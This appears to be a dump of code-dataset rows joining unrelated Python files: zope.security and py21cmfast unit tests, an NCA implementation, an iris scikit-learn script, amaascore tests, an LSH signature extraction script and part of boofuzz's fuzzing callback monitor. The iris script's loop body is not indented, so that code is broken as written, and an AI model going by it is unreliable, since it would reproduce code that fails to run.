        self.assertTrue(context._actions[1]['callable'] is provideInterface)
        self.assertEqual(context._actions[1]['args'], ('', IFactory))
class Foo(object):
    """Minimal content class used as the directive target in these tests."""
    pass
class Test_protectModule(unittest.TestCase):
    """Tests for zope.security.metaconfigure.protectModule."""

    def setUp(self):
        # Reset the global checker registry between tests.
        from zope.security.checker import _clear
        _clear()

    def tearDown(self):
        from zope.security.checker import _clear
        _clear()

    def _callFUT(self, module, name, permission):
        from zope.security.metaconfigure import protectModule
        return protectModule(module, name, permission)

    def test_check_wo_existing_module_checker(self):
        # A new checker is created and registered for the module.
        from zope.security import tests as module
        from zope.security.checker import _checkers
        perm = object()
        self._callFUT(module, 'name', perm)
        checker = _checkers[module]
        self.assertTrue(checker.get_permissions['name'] is perm)

    def test_check_w_existing_module_checker_zope_Public(self):
        # An existing checker is reused; zope.Public maps to CheckerPublic.
        from zope.security import tests as module
        from zope.security.checker import Checker
        from zope.security.checker import CheckerPublic
        from zope.security.checker import _checkers
        before = _checkers[module] = Checker({'other': CheckerPublic})
        self._callFUT(module, 'name', zope_Public)
        checker = _checkers[module]
        self.assertTrue(checker is before)
        self.assertTrue(checker.get_permissions['name'] is CheckerPublic)
class Test_allow(unittest.TestCase):
    """Tests for the zope.security.metaconfigure.allow directive handler."""

    def setUp(self):
        # Reset the global checker registry between tests.
        from zope.security.checker import _clear
        _clear()

    def tearDown(self):
        from zope.security.checker import _clear
        _clear()

    def _callFUT(self, context, attributes=None, interface=None):
        # Dispatch so each signature variant of allow() gets exercised.
        from zope.security.metaconfigure import allow
        if interface is None:
            if attributes is None:
                return allow(context)
            return allow(context, attributes)
        if attributes is None:
            return allow(context, interface=interface)
        return allow(context, attributes, interface)

    def test_empty(self):
        context = DummyZCMLContext()
        self._callFUT(context)
        self.assertEqual(len(context._actions), 0)

    def test_w_attributes(self):
        from zope.security.metaconfigure import protectModule
        ATTRS = ['foo', 'bar']
        context = DummyZCMLContext()
        context.module = 'testing'
        self._callFUT(context, ATTRS)
        # One protectModule action per attribute, public permission.
        self.assertEqual(len(context._actions), len(ATTRS))
        self.assertEqual(context._actions[0]['discriminator'],
                         ('http://namespaces.zope.org/zope:module',
                          'testing', 'foo'))
        self.assertTrue(context._actions[0]['callable'] is protectModule)
        self.assertEqual(context._actions[0]['args'],
                         ('testing', 'foo', zope_Public))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('http://namespaces.zope.org/zope:module',
                          'testing', 'bar'))
        self.assertTrue(context._actions[1]['callable'] is protectModule)
        self.assertEqual(context._actions[1]['args'],
                         ('testing', 'bar', zope_Public))

    def test_w_interface(self):
        from zope.interface import Attribute
        from zope.interface import Interface
        from zope.security.metaconfigure import protectModule
        class IFoo(Interface):
            bar = Attribute('Bar')
        context = DummyZCMLContext()
        context.module = 'testing'
        self._callFUT(context, interface=[IFoo])
        self.assertEqual(len(context._actions), 1)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('http://namespaces.zope.org/zope:module',
                          'testing', 'bar'))
        self.assertTrue(context._actions[0]['callable'] is protectModule)
        self.assertEqual(context._actions[0]['args'],
                         ('testing', 'bar', zope_Public))

    def test_w_both(self):
        from zope.interface import Attribute
        from zope.interface import Interface
        from zope.security.metaconfigure import protectModule
        class IFoo(Interface):
            bar = Attribute('Bar')
            baz = Attribute('Baz')
        ATTRS = ['foo', 'bar']
        context = DummyZCMLContext()
        context.module = 'testing'
        self._callFUT(context, ATTRS, [IFoo])
        # Attribute and interface names are merged ('bar' appears once).
        self.assertEqual(len(context._actions), 3)
        self.assertEqual(context._actions[0]['discriminator'],
                         ('http://namespaces.zope.org/zope:module',
                          'testing', 'foo'))
        self.assertTrue(context._actions[0]['callable'] is protectModule)
        self.assertEqual(context._actions[0]['args'],
                         ('testing', 'foo', zope_Public))
        self.assertEqual(context._actions[1]['discriminator'],
                         ('http://namespaces.zope.org/zope:module',
                          'testing', 'bar'))
        self.assertTrue(context._actions[1]['callable'] is protectModule)
        self.assertEqual(context._actions[1]['args'],
                         ('testing', 'bar', zope_Public))
        self.assertEqual(context._actions[2]['discriminator'],
                         ('http://namespaces.zope.org/zope:module',
                          'testing', 'baz'))
        self.assertTrue(context._actions[2]['callable'] is protectModule)
        self.assertEqual(context._actions[2]['args'],
                         ('testing', 'baz', zope_Public))
class Test_requre(unittest.TestCase):
    """Tests for ``zope.security.metaconfigure.require``.

    NOTE(review): the class name looks like a typo for ``Test_require``;
    kept as-is because test loaders discover the class by this name.
    """

    def setUp(self):
        from zope.security.checker import _clear
        _clear()

    def tearDown(self):
        from zope.security.checker import _clear
        _clear()

    def _callFUT(self, context, permission, attributes=None, interface=None):
        from zope.security.metaconfigure import require
        if interface is None:
            if attributes is None:
                return require(context, permission)
            return require(context, permission, attributes)
        if attributes is None:
            return require(context, permission, interface=interface)
        return require(context, permission, attributes, interface)

    def _check_action(self, action, attr, permission):
        """Assert one recorded ZCML action protects *attr* with *permission*."""
        from zope.security.metaconfigure import protectModule
        self.assertEqual(
            action['discriminator'],
            ('http://namespaces.zope.org/zope:module', 'testing', attr))
        self.assertTrue(action['callable'] is protectModule)
        self.assertEqual(action['args'], ('testing', attr, permission))

    def test_empty(self):
        # Neither attributes nor interface: nothing gets registered.
        context = DummyZCMLContext()
        context.module = 'testing'
        perm = object()
        self._callFUT(context, perm)
        self.assertEqual(len(context._actions), 0)

    def test_w_attributes(self):
        context = DummyZCMLContext()
        context.module = 'testing'
        perm = object()
        self._callFUT(context, perm, ['foo', 'bar'])
        self.assertEqual(len(context._actions), 2)
        self._check_action(context._actions[0], 'foo', perm)
        self._check_action(context._actions[1], 'bar', perm)

    def test_w_interface(self):
        from zope.interface import Attribute
        from zope.interface import Interface

        class IFoo(Interface):
            bar = Attribute('Bar')

        context = DummyZCMLContext()
        context.module = 'testing'
        perm = object()
        self._callFUT(context, perm, interface=[IFoo])
        self.assertEqual(len(context._actions), 1)
        self._check_action(context._actions[0], 'bar', perm)

    def test_w_both(self):
        from zope.interface import Attribute
        from zope.interface import Interface

        class IFoo(Interface):
            bar = Attribute('Bar')
            baz = Attribute('Baz')

        context = DummyZCMLContext()
        context.module = 'testing'
        perm = object()
        self._callFUT(context, perm, ['foo', 'bar'], [IFoo])
        self.assertEqual(len(context._actions), 3)
        # Explicit attributes first, then the remaining interface attribute.
        for idx, attr in enumerate(('foo', 'bar', 'baz')):
            self._check_action(context._actions[idx], attr, perm)
class DummyZCMLContext(object):
    """Minimal stand-in for a ZCML configuration context.

    Records every ``action()`` call as a dict so tests can inspect the
    actions a directive would have registered.
    """

    def __init__(self):
        self._actions = []

    def action(self, **kw):
        # Store a copy so later mutation of the caller's kwargs cannot
        # retroactively change the recorded action.
        self._actions.append(kw.copy())
def test_suite():
    """Return this module's tests for legacy ``unittest``-suite runners."""
    loader = unittest.defaultTestLoader
    return loader.loadTestsFromName(__name__)
| StarcoderdataPython |
6515315 | """
Unit tests for output structures
"""
import pytest
import copy
import pickle
from py21cmfast import InitialConditions # An example of an output struct
from py21cmfast import IonizedBox, PerturbedField, TsBox, global_params
@pytest.fixture(scope="function")
def init(default_user_params):
    # A fresh, not-yet-initialised InitialConditions instance per test.
    return InitialConditions(user_params=default_user_params)
@pytest.mark.parametrize("cls", [InitialConditions, PerturbedField, IonizedBox, TsBox])
def test_pointer_fields(cls):
    """Array initialisation should only ever add names listed in ``pointer_fields``."""
    if cls is InitialConditions:
        inst = cls()
    else:
        # Every non-IC output struct requires a redshift at construction.
        with pytest.raises(KeyError):
            cls()
        inst = cls(redshift=7.0)
    # Get list of fields before and after array initialisation
    d = copy.copy(list(inst.__dict__.keys()))
    inst._init_arrays()
    new_names = [name for name in inst.__dict__ if name not in d]
    assert new_names
    assert all(n in inst.pointer_fields for n in new_names)
    # cstruct shouldn't be initialised until _init_cstruct() is called.
    assert not inst.arrays_initialized
    inst._init_cstruct()
    assert inst.arrays_initialized
def test_non_existence(init, test_direc):
    # Nothing has been written yet, so the cache file must not exist.
    assert not init.exists(direc=test_direc)
def test_writeability(init):
    """init is not initialized and therefore can't write yet."""
    # Writing an unfilled struct must be rejected with an IOError.
    with pytest.raises(IOError):
        init.write()
def test_readability(test_direc, default_user_params):
    """A written struct can be read back and compares equal to the original."""
    # we update this one, so don't use the global one
    ic_ = InitialConditions(init=True, user_params=default_user_params)
    # TODO: fake it being filled (need to do both of the following to fool it.
    # TODO: Actually, we *shouldn't* be able to fool it at all, but hey.
    ic_.filled = True
    ic_.random_seed  # accessing random_seed actually creates a random seed.
    ic_.write(direc=test_direc)
    ic2 = InitialConditions(user_params=default_user_params)
    # without seeds, they are obviously exactly the same.
    assert ic_._seedless_repr() == ic2._seedless_repr()
    assert ic2.exists(direc=test_direc)
    ic2.read(direc=test_direc)
    assert repr(ic_) == repr(ic2)  # they should be exactly the same.
    assert str(ic_) == str(ic2)  # their str is the same.
    assert hash(ic_) == hash(ic2)
    assert ic_ == ic2
    assert ic_ is not ic2
    # make sure we can't read it twice
    with pytest.raises(IOError):
        ic2.read(direc=test_direc)
def test_different_seeds(init, default_user_params):
    """Structs differing only in seed are unequal but share a seedless repr/md5."""
    ic2 = InitialConditions(random_seed=2, user_params=default_user_params)
    assert init is not ic2
    assert init != ic2
    assert repr(init) != repr(ic2)
    assert init._seedless_repr() == ic2._seedless_repr()
    assert init._md5 == ic2._md5
    # make sure we didn't inadvertantly set the random seed while doing any of this
    assert init._random_seed is None
def test_pickleability(default_user_params):
    """A filled struct must survive a pickle round-trip with an identical repr."""
    ic_ = InitialConditions(init=True, user_params=default_user_params)
    ic_.filled = True
    ic_.random_seed  # force the seed to be generated before pickling
    s = pickle.dumps(ic_)
    ic2 = pickle.loads(s)
    assert repr(ic_) == repr(ic2)
def test_fname(default_user_params):
    """Filenames depend on the seed; the skeleton (seedless) name does not."""
    ic1 = InitialConditions(user_params=default_user_params)
    ic2 = InitialConditions(user_params=default_user_params)
    # we didn't give them seeds, so can't access the filename attribute
    # (it is undefined until a seed is set)
    with pytest.raises(AttributeError):
        assert ic1.filename != ic2.filename  # random seeds are different
    # *but* should be able to get a skeleton filename:
    assert ic1._fname_skeleton == ic2._fname_skeleton
    ic1.random_seed  # sets the random seed
    ic2.random_seed
    assert ic1.filename != ic2.filename  # random seeds should now be different
    assert ic1._fname_skeleton == ic2._fname_skeleton
def test_match_seed(test_direc, default_user_params):
    """Reading must refuse a cached box whose seed differs from ours."""
    # we update this one, so don't use the global one
    ic_ = InitialConditions(init=True, random_seed=12, user_params=default_user_params)
    # fake it being filled
    ic_.filled = True
    ic_.random_seed
    ic_.write(direc=test_direc)
    ic2 = InitialConditions(random_seed=1, user_params=default_user_params)
    # should not read in just anything if its random seed is set.
    with pytest.raises(IOError):
        ic2.read(direc=test_direc)
def test_bad_class_definition(default_user_params):
    """A subclass missing a required array must fail to initialise."""
    class CustomInitialConditions(InitialConditions):
        _name = "InitialConditions"
        """
        A class containing all initial conditions boxes.
        """
        def _init_arrays(self):
            super()._init_arrays()
            # remove one of the arrays that needs to be defined.
            del self.hires_density
    with pytest.raises(AttributeError):
        CustomInitialConditions(init=True, user_params=default_user_params)
def test_pre_expose(init):
    # haven't actually tried to read in or fill the array yet.
    # NOTE(review): ``pytest.raises(Exception)`` is very broad; pinning the
    # concrete exception type would make this test stricter — confirm what
    # ``_expose`` actually raises before tightening.
    with pytest.raises(Exception):
        init._expose()
def test_bad_write(init):
    """Writing a filled struct without a random seed must raise ValueError."""
    init.filled = True
    # no random seed yet so shouldn't be able to write.
    with pytest.raises(ValueError):
        init.write()
def test_global_params_keys():
    # Sanity check: global_params behaves like a mapping exposing known keys.
    assert "HII_FILTER" in global_params.keys()
| StarcoderdataPython |
6468811 | import numpy as np
import json
class NCA():
    """Neighbourhood Components Analysis (Goldberger et al., 2005).

    Learns a linear projection ``A`` of shape ``(n_features, var_dims)`` by
    full-batch gradient *ascent* on the expected leave-one-out accuracy of a
    stochastic nearest-neighbour classifier in the projected space.
    """

    def __init__(self, var_dims, learning_rate=0.01, max_steps=100,
                 init_style="normal", init_stddev=0.1):
        # var_dims: dimensionality of the projected space.
        self.var_dims = var_dims
        # Step size for the gradient-ascent update of A.
        self.learning_rate = learning_rate
        # Number of full-batch gradient steps to take.
        self.max_steps = max_steps
        # "normal" or "uniform" initialisation of A.
        self.init_style = init_style
        # Standard deviation used by the "normal" initialisation.
        self.init_stddev = init_stddev

    def transform(self, X):
        """Project samples ``X`` (shape (n, d)) with the learned matrix ``A``."""
        halfM = np.dot(X, self.A)
        return halfM

    def fit_transform(self, X, Y):
        """Fit on ``(X, Y)`` and return the projected ``X``."""
        self.fit(X, Y)
        return self.transform(X)

    def init_matrix(self, shape):
        """Return an initial projection matrix of the given ``shape``.

        Raises:
            ValueError: if ``init_style`` is neither "normal" nor "uniform".
        """
        if self.init_style == "normal":
            return self.init_stddev * np.random.standard_normal(size=shape)
        elif self.init_style == "uniform":
            return np.random.uniform(size=shape)
        # BUG FIX: previously printed "error style!" and raised a bare
        # ``Exception``; raise an informative ValueError instead (still
        # caught by any pre-existing ``except Exception`` handlers).
        raise ValueError("unknown init_style: {!r}".format(self.init_style))

    def fit(self, X, Y):
        """Learn ``self.A`` from data ``X`` (n, d) and labels ``Y`` (n,).

        Side effect (kept from the original API): dumps the per-step
        objective history to ``fA_<learning_rate>.json``.
        """
        (n, d) = X.shape
        self.n_samples = n
        self.param_dims = d
        self.A = self.init_matrix(shape=(self.param_dims, self.var_dims))
        res = []
        for _ in range(self.max_steps):
            halfM = np.dot(X, self.A)
            # Pairwise squared distances in the projected space via
            # ||a-b||^2 = ||a||^2 + ||b||^2 - 2 a.b (broadcasting).
            sum_row = np.sum(halfM ** 2, axis=1)
            xxt = np.dot(halfM, halfM.transpose())
            dist_mat = sum_row + np.reshape(sum_row, (-1, 1)) - 2 * xxt
            exp_neg_dist = np.exp(-dist_mat)
            # A point is never its own neighbour: zero the diagonal.
            exp_neg_dist = exp_neg_dist - np.diag(np.diag(exp_neg_dist))
            # p_ik: probability that i picks k as its neighbour.
            prob_mat = exp_neg_dist / np.sum(exp_neg_dist, axis=1).reshape((-1, 1))
            # p_i: probability of classifying sample i correctly.
            prob_row = np.array([np.sum(prob_mat[i][Y == Y[i]])
                                 for i in range(self.n_samples)])
            target = np.sum(prob_row)
            # BUG FIX: record the objective for *every* step. Previously the
            # history was appended one step late (``if s >= 1``), so it was
            # shifted by one and silently dropped the final value.
            res.append(target)
            # Gradient of the objective w.r.t. A (up to the factor applied
            # below): sum over i of p_i * sum_k p_ik x_ik x_ik^T minus the
            # same sum restricted to same-class neighbours.
            gradients = np.zeros((self.param_dims, self.param_dims))
            for i in range(self.n_samples):
                k_sum = np.zeros((self.param_dims, self.param_dims))
                k_same_sum = np.zeros((self.param_dims, self.param_dims))
                for k in range(self.n_samples):
                    out_prod = np.outer(X[i] - X[k], X[i] - X[k])
                    k_sum += prob_mat[i][k] * out_prod
                    if Y[k] == Y[i]:
                        k_same_sum += prob_mat[i][k] * out_prod
                gradients += prob_row[i] * k_sum - k_same_sum
            gradients = 2 * np.dot(gradients, self.A)
            # Gradient *ascent*: we maximise the expected accuracy.
            self.A += self.learning_rate * gradients
        # Persist the objective history; ``with`` guarantees the handle is
        # closed even if serialisation fails (previously a bare close()).
        with open('fA_' + str(self.learning_rate) + '.json', 'w+') as f:
            f.write(json.dumps({'result': res}))
1952472 | import matplotlib
import numpy as np #for array operations
from sklearn import model_selection # spliting the data (80,20)
import pandas #used toread csv file
from sklearn.metrics import classification_report
from sklearn.metrics import confusion_matrix
from sklearn.metrics import accuracy_score
'''------------------ALGORITHMS---------------------'''
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
print("-------------STARTING-----------------\n")
names=['sepal-length','sepal-width','petal-length','petal-width','class']
dataset=pandas.read_csv('./iris.csv',names=names)
print(f"\n----------classes-----------\n {dataset.groupby('class').size()}\n---------------------------\n")
#print(dataset)
#split-out validation or test data (80% training data) /(20% test data)
array=dataset.values
x=array[:,0:4]
y=array[:,4]
validation_size=0.20 #20%
seed=7
scoring='accuracy'
#it splits the data into two sets training set(which is used to train the model) and test data(which is used to check or measure the accuracy of the model)
x_train, x_test, y_train, y_test=model_selection.train_test_split(x,y,test_size=validation_size,random_state=seed)
#ALGORITHMS
models=[] #empty list
models.append(('LR',LogisticRegression(solver='liblinear',multi_class='ovr')))
models.append(('LDA',LinearDiscriminantAnalysis()))
models.append(('KNN',KNeighborsClassifier()))
models.append(('CART',DecisionTreeClassifier()))
models.append(('NB',GaussianNB()))
models.append(('SVM',SVC(gamma='auto')))
results=[]
names=[]
for name,model in models:
'''kfold : Provides train/test indices to split data in train/test
sets. Split dataset into k consecutive folds (without shuffling by default).
Each fold is then used once as a validation while the k - 1
remaining folds form the training set.'''
kfold=model_selection.KFold(n_splits=10,random_state=seed)
cv_results=model_selection.cross_val_score(model, x_train,y_train,cv=kfold,scoring=scoring)
results.append(cv_results)
names.append(name)
print(f"{name} : {cv_results.mean()*100}%")
print("-----------------using seperately---------------------")
knn=KNeighborsClassifier()
knn.fit(x_train,y_train)
predictions=knn.predict(x_test)
print(str(accuracy_score(y_test,predictions)*100)+" %")
print(confusion_matrix(y_test,predictions))
print(classification_report(y_test,predictions))
print("\n-------------------ENTER ATTRIBUTES(prediction using SVC)-----------------------\n")
sepallength=float(input("Enter sepal-length : "))
sepalwidth=float(input("Enter sepal-width : "))
petallength=float(input("Enter petal-length : "))
petalwidth=float(input("Enter petal-width : "))
input_data=np.array([sepallength,sepalwidth,petallength,petalwidth])
input_data=input_data.reshape(1,-1)
svm_model=SVC(gamma='auto')
svm_model.fit(x_train,y_train)
predictions=svm_model.predict(input_data)
print("\n--------------------------------\n")
print(f"class : {predictions[0]}")
print("\n--------------------------------\n") | StarcoderdataPython |
11389363 | from __future__ import absolute_import, division, print_function, unicode_literals
import json
import unittest
from amaascore.market_data.eod_price import EODPrice
from amaascore.tools.generate_market_data import generate_eod_price
class EODPriceTest(unittest.TestCase):
    """Tests for EODPrice construction and dict/JSON serialisation round-trips."""
    def setUp(self):
        self.longMessage = True  # Print complete error message on failure
        # Generate a random EODPrice fixture and remember its asset_id for checks.
        self.eod_price = generate_eod_price()
        self.asset_id = self.eod_price.asset_id
    def tearDown(self):
        pass
    def test_EODPrice(self):
        # The generator must produce a genuine EODPrice instance.
        self.assertEqual(type(self.eod_price), EODPrice)
    def test_EODPriceToDict(self):
        # __dict__ exposes the attributes directly, including asset_id.
        eod_price_dict = self.eod_price.__dict__
        self.assertEqual(type(eod_price_dict), dict)
        self.assertEqual(eod_price_dict.get('asset_id'), self.asset_id)
    def test_EODPriceToJSON(self):
        eod_price_json = self.eod_price.to_json()
        self.assertEqual(eod_price_json.get('asset_id'), self.asset_id)
        # If eod_price_json is valid JSON, this will run without serialisation errors
        json_asset_id = json.loads(json.dumps(eod_price_json, ensure_ascii=False)).get('asset_id')
        self.assertEqual(json_asset_id, self.asset_id)
if __name__ == '__main__':
    # Allow running this test module directly from the command line.
    unittest.main()
| StarcoderdataPython |
9799568 | global Device
from src.utils import *
from src.utils.read_data import SentenceDataset
from collections import defaultdict
from src.sbert_lsh_model import SBERTLSHModel, BertLSHModel
import os
# ---------------------------------------------------------------------------
# Setup: parse options, create the output dir, pick the embedding model, and
# open one output file per (side, representation) combination.
# ---------------------------------------------------------------------------
OPTS = Config.from_command_line(
    arg_defaults=[
        ##### I/O ####
        ("input", str, "", "input data file: source - target tsv"),
        ("split", str, "", "split"),
        ("output_dir", str, "", "output path"),
        #### BERT #####
        ("bert_type", str, "sbert", "type of BERT from which to extract embeddings"),
        ("sbert_type", str, 'roberta-large', 'if bert_type is sbert, the base type'),
        ("batch_size", int, 32, "Batch size"),
        ("gpuid", int, -1, "GPU ID (-1 for CPU)"),
        ("max_seq_length", int, 20, "model max seq len"),
        #### MULTI JOBS ####
        ("local_rank", int, -1, "batch displacement for distributed feature extraction"),
        ("num_threads", int, 1, ""),
        #### SIGNATURE OPTS #####
        ("lsh_dim", int, 10, "number of base vectors for LSH hash (= number bits in signature)"),
        ("sep_token", str, "$SEP$", "separating token"),
        #### SOURCE/TARGET PARAMS ####
        ("source_repr", str, "seq", "representation of source {seq, both, prefix}. for multiple concat w/comma"),
        ("target_repr", str, "both", "representation of target {seq, both, prefix}. for multiple concat w/comma"),
        ("source_lang", str, "cause", "source language"),
        # NOTE(review): the help string for target_lang says "source language" —
        # looks like a copy/paste slip; left as-is because help text is runtime data.
        ("target_lang", str, "effect", "source language"),
        #### MISC ####
        ("debug", int, 0, "debug"),
        ("seed", int, 1234, "random seed"),
        ("remove_end_punc", int, 1, 'whether to strip the period from the end (for copa examples)'),
        ('exclude_prefix_patterns', int, 1, 'hacky exclusion of effects with ill-formed patterns from causalbank'),
        ('example_bins', int, 0, 'print bins with most examples'),
    ],
    description="prepends bit signatures to training/dev/test data"
)
# Required options must be non-empty ("not not x" is just a truthiness check).
for req_attr in [
    'input', 'split', 'output_dir'
]:
    assert not not getattr(OPTS, req_attr)
from pathlib import Path
Path(OPTS.output_dir).mkdir(parents=True, exist_ok=True)
## set up device
Device.set_device(OPTS.gpuid)
Device.set_seed(OPTS.seed)
## set up tokenizer and BERT
print("loading model...")
if OPTS.bert_type in ['bert']:
    sim_model = BertLSHModel(OPTS, Device)
elif OPTS.bert_type in ['sbert']:
    sim_model = SBERTLSHModel(OPTS, Device)
else:
    raise NotImplementedError()
## initialize dataset reader/loader
print('initializing dataset...')
if OPTS.num_threads > 1:
    # Shard the dataset across num_threads workers; this worker takes every
    # num_threads-th line starting at (local_rank - 1).
    every = OPTS.num_threads
    assert (OPTS.local_rank > 0 and OPTS.local_rank <= OPTS.num_threads)
    displace = OPTS.local_rank - 1
else:
    every = 1
    displace = 0
dataset = SentenceDataset(OPTS.input, every=every, displace=displace)
loader = tsv_reader(dataset, OPTS)
initialized_lsh = False
# Per side: signature string -> number of examples that hashed to it.
signature_counts = defaultdict(lambda: defaultdict(int))
# side -> representation ("seq"/"both"/"prefix") -> open output file handle.
# NOTE(review): the loop variable below shadows the builtin ``repr``.
writers = defaultdict(dict)
for side, opt in zip([OPTS.source_lang, OPTS.target_lang], [OPTS.source_repr, OPTS.target_repr]):
    for repr in opt.split(','):
        repr = repr.strip()
        out_file = f"{OPTS.split}.{side}.{repr}"
        writers[side][repr] = open(os.path.join(OPTS.output_dir, out_file), 'w', encoding='utf-8')
if OPTS.example_bins:
    ex_strings = defaultdict(list)
else:
    ex_strings = None
skipped_instances = 0
# Main extraction loop: embed each batch, hash embeddings to bit signatures,
# and write (optionally signature-prefixed) sequences for each side.
for i, pair in enumerate(loader):
    (source_batch, target_batch) = pair
    # Drop pairs where either side exceeds max_seq_length whitespace tokens.
    # NOTE(review): here ``t`` iterates the *source* batch and ``s`` the
    # target batch — the names look swapped, but the pairing is preserved.
    source_batch, target_batch = zip(*[
        (t, s) for (t, s) in zip(source_batch, target_batch)
        if len(t.split()) <= OPTS.max_seq_length and len(s.split()) <= OPTS.max_seq_length
    ])
    # Only compute embeddings for sides that will emit a signature prefix.
    bert_features = {}
    if any([repr in OPTS.target_repr for repr in ['both', 'prefix']]):
        bert_features[OPTS.target_lang] = sim_model.get_embeddings([
            well_formed_sentence(t) for t in target_batch
        ])
        if i == 0 and OPTS.debug:
            ppr(target_batch[:10])
    if any([repr in OPTS.source_repr for repr in ['both', 'prefix']]):
        bert_features[OPTS.source_lang] = sim_model.get_embeddings([
            well_formed_sentence(s) for s in source_batch
        ])
        if i == 0 and OPTS.debug:
            ppr(source_batch[:10])
    if not initialized_lsh:
        # Lazily size the hasher to the embedding dimensionality of the
        # first side that actually produced features.
        sim_model.hasher.reset(
            dim=bert_features[OPTS.target_lang if
                OPTS.target_lang in bert_features
                else OPTS.source_lang].shape[-1]
        )
        initialized_lsh = True
    # side -> list of bit-string signatures, one per batch element.
    signatures = {
        k: [sim_model.hasher.hash_vector(output)[0] for output in bert_features[k]]
        for k in bert_features
    }
    for b_idx, (source, target) in enumerate(zip(source_batch, target_batch)):
        ### hack to handle ill formed causalbank bug
        if OPTS.exclude_prefix_patterns:
            proc_effect = target.lower().strip()
            if any([proc_effect.endswith(x) for x in [
                'be',
                'maybe',
                'actually',
                'partly',
                'it is',
                'it was',
                'that was',
                'that is',]]):
                skipped_instances += 1
                continue
        # Convert a bit string (e.g. "101") to its decimal value as a string.
        to_sig = lambda s_str: str(sum([(2 ** i) * int(b) for (i, b) in enumerate(s_str[::-1])]))
        for side, writer_dict, seq in zip(
            [OPTS.source_lang, OPTS.target_lang],
            [writers[OPTS.source_lang], writers[OPTS.target_lang]],
            [source, target]
        ):
            if any([pr in writer_dict.keys() for pr in ['both', 'prefix']]):
                # Chunk the signature into lsh_dim-bit groups, encode each as
                # $<decimal>$, and terminate with the separator token.
                sig_str = ' '.join(
                    [f"${to_sig(chunk)}$"
                     for chunk in chunks(signatures[side][b_idx], OPTS.lsh_dim)]
                    + [OPTS.sep_token]) + ' '
                signature_counts[side][sig_str] += 1
            else:
                sig_str = ''
            if ex_strings is not None:
                ex_strings[sig_str].append(seq)
            for repr, writer in writer_dict.items():
                # "prefix": signature only; "seq": sentence only; "both": prefix + sentence.
                if repr == 'prefix':
                    seq_str = ''
                else:
                    seq_str = model_output_sentence(seq)
                if repr == 'seq':
                    out_str = seq_str
                else:
                    out_str = sig_str + seq_str
                writer.write(out_str + '\n')
    if OPTS.debug and i == 5: break
for _, dic in writers.items():
    for writ in dic.values(): writ.close()
| StarcoderdataPython |
1617017 | import traceback
from boofuzz import constants, exception
from .base_monitor import BaseMonitor
class CallbackMonitor(BaseMonitor):
    """
    New-Style Callback monitor that is used in Session to provide callback-arrays.

    It's purpose is to keep the \\*_callbacks arguments in the session class while
    simplifying the implementation of session by forwarding these callbacks to
    the monitor infrastructure.

    The mapping of arguments to method implementations of this class is as follows:

    - restart_callbacks --> target_restart
    - pre_send_callbacks --> pre_send
    - post_test_case_callbacks --> post_send
    - post_start_target_callbacks --> post_start_target

    All other implemented interface members are stubs only, as no corresponding
    arguments exist in session. In any case, it is probably wiser to implement
    a custom Monitor than to use the callback functions.

    .. versionadded:: 0.2.0
    """

    def __init__(self, on_pre_send=None, on_post_send=None, on_restart_target=None, on_post_start_target=None):
        BaseMonitor.__init__(self)
        # Default each callback list to a fresh list (not a shared mutable
        # default argument) so separate instances never share state.
        self.on_pre_send = on_pre_send if on_pre_send is not None else []
        self.on_post_send = on_post_send if on_post_send is not None else []
        self.on_restart_target = on_restart_target if on_restart_target is not None else []
        self.on_post_start_target = on_post_start_target if on_post_start_target is not None else []

    def pre_send(self, target=None, fuzz_data_logger=None, session=None):
        """This method iterates over all supplied pre send callbacks and executes them.
        Their return values are discarded, exceptions are catched and logged, but otherwise
        discarded.
        """
        try:
            for f in self.on_pre_send:
                fuzz_data_logger.open_test_step('Pre_Send callback: "{0}"'.format(f.__name__))
                f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
        except Exception:
            fuzz_data_logger.log_error(
                constants.ERR_CALLBACK_FUNC.format(func_name="pre_send") + traceback.format_exc()
            )

    def post_send(self, target=None, fuzz_data_logger=None, session=None):
        """This method iterates over all supplied post send callbacks and executes them.
        Their return values are discarded, exceptions are caught and logged:

        - :class:`BoofuzzTargetConnectionReset <boofuzz.exception.BoofuzzTargetConnectionReset>` will log a failure
        - :class:`BoofuzzTargetConnectionAborted <boofuzz.exception.BoofuzzTargetConnectionAborted>` will log an info
        - :class:`BoofuzzTargetConnectionFailedError <boofuzz.exception.BoofuzzTargetConnectionFailedError>` will log a
          failure
        - :class:`BoofuzzSSLError <boofuzz.exception.BoofuzzSSLError>` will log either info or failure, depending on
          if the session ignores SSL/TLS errors.
        - every other exception is logged as an error.

        All exceptions are discarded after handling.
        """
        try:
            for f in self.on_post_send:
                fuzz_data_logger.open_test_step('Post-test case callback: "{0}"'.format(f.__name__))
                f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
        except exception.BoofuzzTargetConnectionReset:
            fuzz_data_logger.log_fail(constants.ERR_CONN_RESET_FAIL)
        except exception.BoofuzzTargetConnectionAborted as e:
            fuzz_data_logger.log_info(
                constants.ERR_CONN_ABORTED.format(socket_errno=e.socket_errno, socket_errmsg=e.socket_errmsg)
            )
        except exception.BoofuzzTargetConnectionFailedError:
            fuzz_data_logger.log_fail(constants.ERR_CONN_FAILED)
        except exception.BoofuzzSSLError as e:
            if session._ignore_connection_ssl_errors:
                fuzz_data_logger.log_info(str(e))
            else:
                fuzz_data_logger.log_fail(str(e))
        except Exception:
            fuzz_data_logger.log_error(
                constants.ERR_CALLBACK_FUNC.format(func_name="post_send") + traceback.format_exc()
            )
        finally:
            fuzz_data_logger.open_test_step("Cleaning up connections from callbacks")
        # BUG FIX: ``return True`` used to sit *inside* the ``finally`` block,
        # which silently swallowed any in-flight exception not handled above
        # (e.g. KeyboardInterrupt/SystemExit). Returning after the
        # try-statement keeps the normal-path behaviour without masking them.
        return True

    def restart_target(self, target=None, fuzz_data_logger=None, session=None):
        """
        This Method tries to restart a target. If no restart callbacks are set,
        it returns false; otherwise it returns true.

        :returns: bool
        """
        try:
            for f in self.on_restart_target:
                fuzz_data_logger.open_test_step('Target restart callback: "{0}"'.format(f.__name__))
                f(target=target, fuzz_data_logger=fuzz_data_logger, session=session, sock=target)
        except exception.BoofuzzRestartFailedError:
            # A failed restart is fatal for the session; propagate it
            # (the finally-block below still runs its cleanup first).
            raise
        except Exception:
            fuzz_data_logger.log_error(
